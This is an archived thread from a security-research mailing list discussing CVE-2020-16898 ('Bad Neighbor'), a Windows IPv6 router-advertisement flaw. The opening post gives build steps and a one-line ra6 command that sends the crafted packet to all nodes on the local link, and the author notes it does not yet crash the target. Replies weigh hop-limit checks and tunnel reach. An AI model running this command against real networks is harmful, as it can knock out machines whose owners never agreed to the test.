[ipv6hackers] CVE-2020-16898: "Bad Neighbor" (IPv6 SLAAC/RDNSS)

12 views
Skip to first unread message

Fernando Gont

unread,
Oct 14, 2020, 12:57:48 PM10/14/20
to IPv6 Hackers Mailing List
Folks,

You may be aware about CVE-2020-16898. If not, now you are :-) :
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/

I've produced PoC for the aforementioned vulnerability according to the
description on the McAfee site, but somehow I seem to fail to trigger
the "Blue Screen Of Death" when trying the attack against my local MS
Windows 10 installation.

FWIW, the packet I'm sending can be downloaded (pcap) here:
https://www.gont.com.ar/pcaps/bad-neighbor.pcap

The packet can be crafted with the ra6 tool of the SI6 toolkit present
in the "nd-opt-fuzzing" branch of the github repo
(https://github.com/fgont/ipv6toolkit). That is,

git clone https://github.com/fgont/ipv6toolkit.git
cd ipv6toolkit
git checkout nd-opt-fuzzing
sudo make install


And then run the ra6 tool as:

sudo ra6 -i INTERFACE --bad-neighbor -d ff02::1 -v -e


Note that this will target all nodes on the local-link for the INTERFACE
interface. You may set the "-d" option to a unicast address if you want
to target a single system.

I'll keep looking further into this issue and report back to the group
if I find anything.

If you do play with the tool and test the PoC, please do let me/us know.

Thanks!

Regards,
--
Fernando Gont
SI6 Networks
e-mail: fg...@si6networks.com
PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492




_______________________________________________
Ipv6hackers mailing list
Ipv6h...@lists.si6networks.com
https://lists.si6networks.com/mailman/listinfo/ipv6hackers

Marc Heuse

unread,
Oct 14, 2020, 1:07:14 PM10/14/20
to IPv6 Hackers Mailing List
Everywhere it’s classified as remote and wormable - but I would expect it to only work on the local lan due hop count security.
When you get it working please test if it is the case ... thanks!

Gert Doering

unread,
Oct 14, 2020, 1:42:54 PM10/14/20
to IPv6 Hackers Mailing List
Hi,

On Wed, Oct 14, 2020 at 07:06:19PM +0200, Marc Heuse wrote:
> Everywhere it???s classified as remote and wormable - but I would expect it to only work on the local lan due hop count security.

This assumes that Windows does the (required...) HopCount=255 check
on reception.

Given that other OSes have been found to neglect this check in the past, I
wouldn't bet my Windows VMs on this...

Gert Doering
-- NetMaster
--
have you enabled IPv6 on something today...?

SpaceNet AG Vorstand: Sebastian v. Bomhard, Michael Emmer
Joseph-Dollinger-Bogen 14 Aufsichtsratsvors.: A. Grundner-Culemann
D-80807 Muenchen HRB: 136055 (AG Muenchen)
Tel: +49 (0)89/32356-444 USt-IdNr.: DE813185279

Fernando Gont

unread,
Oct 14, 2020, 1:44:17 PM10/14/20
to IPv6 Hackers Mailing List, Marc Heuse
Hi, Marc,

On 14/10/20 14:06, Marc Heuse wrote:
> Everywhere it’s classified as remote and wormable - but I would expect it to only work on the local lan due hop count security.

I agree with this, except for cases where e.g. ISATAP is employed. --
for instance, ISATAP relies on RAs that traverse multiple links tunneled
on IPv4 packets.


> When you get it working please test if it is the case ... thanks!

Once I figure how to trigger the "blue screen", I will extend the
testing to e.g. attack ISATAP tunnels.

Will then report back to the group.

Thanks!

Regards,
--
Fernando Gont
SI6 Networks
e-mail: fg...@si6networks.com
PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492

Fernando Gont

unread,
Oct 14, 2020, 2:20:54 PM10/14/20
to IPv6 Hackers Mailing List, Gert Doering
Hi, Gert,

On 14/10/20 14:42, Gert Doering wrote:
> Hi,
>
> On Wed, Oct 14, 2020 at 07:06:19PM +0200, Marc Heuse wrote:
>> Everywhere it???s classified as remote and wormable - but I would expect it to only work on the local lan due hop count security.
>
> This assumes that Windows does the (required...) HopCount=255 check
> on reception.
>
> Given that other OSes have been found to neglect this check in the past, I
> wouldn't bet my Windows VMs on this...

THe general purpose OSes I have tested (*BSD, Linux, MS Windows) seemed
to do the Hop Limit check. In this case, since this is an
implementation-dependent vulnerability, I'd guess it's mostly Windows
that matters, though.

Thanks,
--
Fernando Gont
SI6 Networks
e-mail: fg...@si6networks.com
PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492




Reply all
Reply to author
Forward
0 new messages